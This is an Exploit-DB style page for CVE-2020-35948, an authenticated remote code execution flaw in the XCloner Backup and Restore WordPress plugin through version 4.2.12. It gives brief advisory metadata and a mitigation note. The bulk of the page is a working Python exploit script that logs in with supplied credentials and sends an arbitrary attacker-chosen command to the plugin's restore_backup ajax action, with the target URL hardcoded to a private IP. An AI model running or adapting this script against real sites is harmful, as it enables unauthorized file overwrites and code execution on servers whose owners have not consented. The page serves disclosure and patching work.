Wordpress Plugin XCloner 4.2.12 - Remote Code Execution (Authenticated)

vendor:

XCloner Backup and Restore

by:

Ron Jost

8.8

CVSS

HIGH

Remote Code Execution

732

CWE

Product Name: XCloner Backup and Restore

Affected Version From: 4.2.2001

Affected Version To: 4.2.12

Patch Exists: YES

Related CWE: CVE-2020-35948

CPE: a:xcloner:xcloner:4.2.1

Metasploit:

Other Scripts:

Platforms Tested: Ubuntu 18.04

2021

WordPress Plugin XCloner 4.2.12 – Remote Code Execution (Authenticated)

An issue was discovered in the XCloner Backup and Restore plugin before 4.2.13 for WordPress. It gave authenticated attackers the ability to modify arbitrary files, including PHP files. Doing so would allow an attacker to achieve remote code execution. The xcloner_restore.php write_file_action could overwrite wp-config.php, for example. Alternatively, an attacker could create an exploit chain to obtain a database dump.

Mitigation:

Update to version 4.2.13 or higher.

Source

Exploit-DB raw data:

# Exploit Title: Wordpress Plugin XCloner 4.2.12 - Remote Code Execution (Authenticated)
# Date 30.06.2021
# Exploit Author: Ron Jost (Hacker5preme)
# Vendor Homepage: https://www.xcloner.com/
# Software Link: https://downloads.wordpress.org/plugin/xcloner-backup-and-restore.4.2.12.zip
# Version: 4.2.1 - 4.2.12
# Tested on: Ubuntu 18.04
# CVE: CVE-2020-35948
# CWE: CWE-732
# Documentation: https://github.com/Hacker5preme/Exploits/blob/main/CVE-2020-35948-Exploit/README.md

'''
Description:
An issue was discovered in the XCloner Backup and Restore plugin before 4.2.13 for WordPress. It gave authenticated attackers the ability to modify arbitrary files, 
including PHP files. Doing so would allow an attacker to achieve remote code execution. The xcloner_restore.php write_file_action could overwrite wp-config.php, 
for example. Alternatively, an attacker could create an exploit chain to obtain a database dump.
'''


'''
Banner:
'''
banner = """


  #####  #     # #######        #####    ###    #####    ###          #####  #######  #####  #        #####  
 #     # #     # #             #     #  #   #  #     #  #   #        #     # #       #     # #    #  #     # 
 #       #     # #                   # #     #       # #     #             # #       #     # #    #  #     # 
 #       #     # #####   #####  #####  #     #  #####  #     # #####  #####  ######   ###### #    #   #####  
 #        #   #  #             #       #     # #       #     #             #       #       # ####### #     # 
 #     #   # #   #             #        #   #  #        #   #        #     # #     # #     #      #  #     # 
  #####     #    #######       #######   ###   #######   ###          #####   #####   #####       #   #####  
                                                                                                             
                                                                                                             
                                                                
                                                                by @Hacker5preme
"""
print(banner)


'''
Import required modules:
'''
import requests
import argparse


'''
User-Input:
'''
my_parser = argparse.ArgumentParser(description='Wordpress Plugin XCloner RCE (Authenticated)')
my_parser.add_argument('-T', '--IP', type=str)
my_parser.add_argument('-P', '--PORT', type=str)
my_parser.add_argument('-U', '--PATH', type=str)
my_parser.add_argument('-u', '--USERNAME', type=str)
my_parser.add_argument('-p', '--PASSWORD', type=str)
args = my_parser.parse_args()
target_ip = args.IP
target_port = args.PORT
wp_path = args.PATH
username = args.USERNAME
password = args.PASSWORD
print('')
ajax_cmd = input('[*] Ajax Command to execute: ')

'''
Authentication:
'''
session = requests.Session()
auth_url = 'http://' + target_ip + ':' + target_port + wp_path + 'wp-login.php'

# Header:
header = {
    'Host': target_ip,
    'User-Agent': 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:89.0) Gecko/20100101 Firefox/89.0',
    'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8',
    'Accept-Language': 'de,en-US;q=0.7,en;q=0.3',
    'Accept-Encoding': 'gzip, deflate',
    'Content-Type': 'application/x-www-form-urlencoded',
    'Origin': 'http://' + target_ip,
    'Connection': 'close',
    'Upgrade-Insecure-Requests': '1'
}

# Body:
body = {
    'log':  username, 
    'pwd': password, 
    'wp-submit': 'Log In', 
    'testcookie': '1'
}

# Authenticate:
print('')
auth = session.post(auth_url, headers=header, data=body)
auth_header= auth.headers['Set-Cookie']
if 'wordpress_logged_in' in auth_header:
    print('[+] Authentication successfull !')
else:
    print('[-] Authentication failed !')
    exit()


'''
Exploit:
'''
url_exploit = "http://192.168.0.38:80/wordpress//wp-admin/admin-ajax.php?action=restore_backup"

header = {
    "Accept": "*/*",
    "Content-Type": "multipart/form-data; boundary=------------------------08425016980d7357",
    "Connection": "close"
}

# Body:
body = "--------------------------08425016980d7357\r\nContent-Disposition: form-data; name=\"xcloner_action\"\r\n\r\n%s\r\n--------------------------08425016980d7357--\r\n" % (ajax_cmd)

exploit = session.post(url_exploit, headers=header, data=body)
print('')
print(exploit.text)
print('')